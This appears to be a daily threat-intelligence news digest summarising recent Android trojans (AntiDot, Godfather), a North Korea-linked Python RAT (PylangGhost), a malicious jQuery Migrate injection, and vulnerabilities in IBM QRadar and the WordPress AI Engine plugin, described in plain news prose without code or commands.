A new Android trojan is turning devices into data-harvesting tools under attackers’ full control. Attributed to the LARVA-398 group, AntiDot has infected thousands of devices through phishing and malicious ads. Using Accessibility Services and screen recording APIs, it steals credentials, intercepts messages, and mimics app logins.

A fake job offer could now come bundled with custom-built spyware. PylangGhost is targeting crypto professionals in India. Delivered through spoofed job sites, the malware includes registry tampering, remote control, and data exfiltration modules aimed at compromising Windows systems.

A popular WordPress plugin is exposing sites to full takeover. It affects the AI Engine plugin, allowing privilege escalation via the MCP module in versions 2.8.0 to 2.8.3. If enabled, this feature gives even low-level users the ability to run admin-level commands - impacting over 100,000 websites and opening the door to site-wide compromise.

Top Malware Reported in the Last 24 Hours

Antidot Android trojan: New MaaS emerges

The AntiDot Android trojan, attributed to the LARVA-398 threat group, has infected over 3,775 devices through 273 distinct attacks, focusing on personal and financial data theft. It operates on a MaaS model, disseminated via malicious ads and targeted phishing campaigns. AntiDot leverages the Android MediaProjection API and Accessibility Services to record screens, intercept SMS messages, and execute keylogging. It can replace authentic app interfaces with counterfeit login pages to capture credentials and sets itself as the default SMS application to monitor and manipulate communications. The malware is controlled through a C2 panel developed on the MeteorJS framework, enabling attackers to configure attacks and manage infected devices effectively.

New version of Godfather malware spotted

The Godfather Android malware has evolved to utilize virtualization, creating isolated environments on devices to hijack over 500 banking, cryptocurrency, and e-commerce applications worldwide. It employs an embedded virtualization framework, leveraging tools like VirtualApp and Xposed for API hooking, allowing it to intercept sensitive data such as credentials, PINs, and transaction details while displaying the legitimate app interface to the user. By using a StubActivity, the malware tricks Android into believing the real app is running, capturing user interactions and manipulating transactions.

Famous Chollima deploys new PylangGhost

Cisco Talos discovered a Python-based RAT named PylangGhost, used by the North Korean-aligned group Famous Chollima. PylangGhost is functionally similar to the GolangGhost RAT but is tailored for Windows, while the Golang version targets MacOS. The threat actors target professionals in cryptocurrency and blockchain industries, mostly in India, using fake job interviews. Fake job sites impersonate legitimate companies like Coinbase and Robinhood, tricking users into executing malicious commands. PylangGhost consists of six Python modules, including "nvidia.py," which handles system registry modifications, communication with the C2 server, and remote control functionalities. 

Malware hidden in JQuery Migrate

Trellix researchers discovered a malware infection using a corrupted version of the jQuery Migrate library, distributed through a compromised WordPress site. The attack leveraged the Parrot TDS, which selectively delivered malware based on user attributes such as device and browser. The malicious script was hidden within the legitimate jQuery Migrate library, using obfuscated code to evade detection and dynamically execute payloads. The malware could perform various actions, including stealing cookies, session data, and credentials, logging keystrokes, phishing, and deploying additional malicious scripts. The infection exploited WordPress's Autoptimize plugin, which left cache folders vulnerable to manipulation, allowing malware to be served from trusted domains.

Top Vulnerabilities Reported in the Last 24 Hours

Multiple bugs in IBM QRadar SIEM

IBM has issued a critical security update for its QRadar SIEM platform due to multiple vulnerabilities, including a severe flaw (CVE-2025-33117) that allows privileged users to execute arbitrary commands, scoring 9.1 on the CVSS scale. Other vulnerabilities include CVE-2025-36050, which permits local users to read sensitive information from log files (CVSS score: 6.2), and CVE-2025-33121, which exposes the system to XML External Entity (XXE) injection attacks (CVSS score: 7.1). These vulnerabilities affect QRadar SIEM versions 7.5 through 7.5.0 Update Package 12 IF01.

Vulnerability impacts 100,000 WordPress sites

A critical vulnerability (CVE-2025-5071) has been discovered in the AI Engine plugin for WordPress, affecting versions 2.8.0 to 2.8.3. This flaw allows authenticated users with subscriber-level access or higher to escalate privileges and execute administrative commands via the Model Context Protocol (MCP) module. The vulnerability has a CVSS score of 8.8 and impacts over 100,000 WordPress sites. Exploitation of this vulnerability can lead to full site compromise, including unauthorized user creation, content manipulation, and backdoor installation. However, this vulnerability only affects sites where the Dev Tools and MCP module have been manually enabled, as both are disabled by default.